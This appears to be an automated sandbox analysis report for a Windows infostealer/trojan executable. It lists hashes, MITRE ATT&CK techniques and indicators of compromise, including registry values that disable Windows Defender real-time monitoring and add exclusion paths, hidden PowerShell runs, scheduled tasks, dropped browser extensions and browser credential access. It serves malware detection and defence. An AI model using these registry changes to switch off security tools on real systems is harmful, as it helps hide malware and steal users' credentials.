649c75d99b6d8e237d8a8d0142796fcbfa7381674628201f474b58039144ec2a

Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

max time kernel
149s
max time network
157s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
11-11-2024 21:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Size

6.3MB
MD5

ded964e022a37d93d434091ec75f9881
SHA1

e89a551ac1f19dc3838e21157667e2f98d84d06b
SHA256

9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde
SHA512

13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af
SSDEEP

196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UBqYudvSNocU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZUXSmeDRU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RqtPwFqMTiUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xonCRuklPFipnPeqKpR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\YSrBLfWUtIHnuviW = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hrOORTLiECQfZJVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oXjeNNLqKAotC = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

pid process

2752 powershell.EXE
676 powershell.EXE
2528 powershell.EXE
1600 powershell.EXE
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe
Executes dropped EXE 3 IoCs

Processes:

Install.exeFjXcTia.exeGUgpQsE.exe

pid process

2288 Install.exe
1984 FjXcTia.exe
928 GUgpQsE.exe
Indirect Command Execution 1 TTPs 2 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
defense_evasion

Indirect Command Execution
T1202

Processes:

forfiles.exeforfiles.exe

pid process

3044 forfiles.exe
1744 forfiles.exe
Loads dropped DLL 4 IoCs

Processes:

9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exeInstall.exe

pid process

2268 9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
2288 Install.exe
2288 Install.exe
2288 Install.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

pid	process
2288	Install.exe
1984	FjXcTia.exe
928	GUgpQsE.exe

pid	process
3044	forfiles.exe
1744	forfiles.exe

pid	process
2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
2288	Install.exe
2288	Install.exe
2288	Install.exe

Drops Chrome extension 1 IoCs

Processes:

GUgpQsE.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	GUgpQsE.exe

Drops file in System32 directory 18 IoCs

Processes:

GUgpQsE.exeInstall.exeFjXcTia.exepowershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	GUgpQsE.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	FjXcTia.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FjXcTia.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	GUgpQsE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	GUgpQsE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311	GUgpQsE.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FjXcTia.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	GUgpQsE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7	GUgpQsE.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	GUgpQsE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	GUgpQsE.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	GUgpQsE.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	GUgpQsE.exe

Drops file in Program Files directory 13 IoCs

Processes:

GUgpQsE.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	GUgpQsE.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	GUgpQsE.exe
File created	C:\Program Files (x86)\UBqYudvSNocU2\DePGOjnKblrHO.dll	GUgpQsE.exe
File created	C:\Program Files (x86)\UBqYudvSNocU2\SDnAqaA.xml	GUgpQsE.exe
File created	C:\Program Files (x86)\xonCRuklPFipnPeqKpR\zFSqddj.dll	GUgpQsE.exe
File created	C:\Program Files (x86)\xonCRuklPFipnPeqKpR\KCoMwBQ.xml	GUgpQsE.exe
File created	C:\Program Files (x86)\oXjeNNLqKAotC\xBhiFFN.dll	GUgpQsE.exe
File created	C:\Program Files (x86)\ZUXSmeDRU\eGjKlH.dll	GUgpQsE.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	GUgpQsE.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	GUgpQsE.exe
File created	C:\Program Files (x86)\ZUXSmeDRU\uFzBbJL.xml	GUgpQsE.exe
File created	C:\Program Files (x86)\oXjeNNLqKAotC\OYezHJn.xml	GUgpQsE.exe
File created	C:\Program Files (x86)\RqtPwFqMTiUn\cPEOinY.dll	GUgpQsE.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bKwcWZekAnYWEgmozo.job	schtasks.exe
File created	C:\Windows\Tasks\MFUxwpyluZmBswWip.job	schtasks.exe
File created	C:\Windows\Tasks\SEVCueFJyRflUhU.job	schtasks.exe
File created	C:\Windows\Tasks\NGWtXtGwgKKYsphzV.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exereg.exereg.execmd.exereg.exereg.exereg.exereg.exereg.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exereg.exeschtasks.exereg.exereg.exereg.exereg.exeschtasks.execmd.exeforfiles.exereg.exereg.exereg.exereg.exeschtasks.exe9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exeschtasks.exeFjXcTia.exeschtasks.execmd.execmd.exereg.exereg.exereg.exeschtasks.exereg.exereg.exereg.exereg.exeschtasks.exereg.exereg.exeschtasks.exeInstall.exeschtasks.exereg.execmd.exeschtasks.exeschtasks.exeschtasks.exereg.exeschtasks.execmd.exeschtasks.exereg.exereg.exereg.exeschtasks.exereg.exeschtasks.exeschtasks.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FjXcTia.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

GUgpQsE.exewscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}\62-86-e9-9c-c5-4e	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-86-e9-9c-c5-4e\WpadDecisionReason = "1"	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	GUgpQsE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-86-e9-9c-c5-4e\WpadDecisionTime = e0cf49d68234db01	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-86-e9-9c-c5-4e\WpadDecisionTime = 006ad8d88234db01	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}\WpadDecisionTime = e0cf49d68234db01	GUgpQsE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}\WpadNetworkName = "Network 3"	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	GUgpQsE.exe
